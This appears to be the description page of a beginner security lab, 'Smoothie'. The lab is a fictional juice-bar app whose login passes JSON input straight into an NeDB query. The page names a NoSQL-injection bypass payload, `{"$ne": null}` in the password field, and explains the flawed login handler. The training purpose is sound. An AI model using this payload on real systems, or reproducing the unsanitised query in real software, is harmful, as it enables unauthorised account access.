Smoothie
A juice bar's online-ordering app. Sign in with a real account, and pay attention to what the login query is actually asking the database for.
The Scenario
Citrine Juice Co. is a one-bar operation in Boston's South End — six bar
stools, a glass case of cold-pressed bottles, and a Saturday-morning
regulars list taped to the side of the espresso machine. Margot opened
it in 2019 and built the online-ordering site herself a year later. The
login form was the last thing she touched before she stopped touching
the code.
Lab Intel
Synopsis
A friendly-looking juice-bar storefront where the login form trusts its inputs to be plain strings.
Architecture
A beginner-friendly Node.js + Express + NeDB shop with a normal-looking customer signup/login flow. NeDB is a pure-JavaScript datastore that speaks the same query-operator dialect as MongoDB. The login handler hands `req.body.email` and `req.body.password` straight to `users.findOneAsync(...)`, so a JSON body whose values are MongoDB operators (instead of strings) sidesteps the password check entirely.
Who It's For
Newcomers who've solved one or two SQLi labs and want to see the same idea against a NoSQL backend.
Skills You'll Practice
- Reading the browser dev-tools network tab to see what shape the login form actually POSTs.
- Re-issuing that POST with curl or Burp, swapping the password string for a `{"$ne": null}` operator.
- Understanding why `findOne` returns the first matching document and how seed order picks the winner.
- Browsing the post-login /account page to find the staff-only field the UI never highlights.
What You'll Gain
- Vocabulary: NoSQL, document, query operator, $ne, $gt.
- A reusable mental model for 'is this input parsed as data or as code?'
- Confidence reaching for curl/Burp the moment a login form's JSON shape suggests a non-string bypass.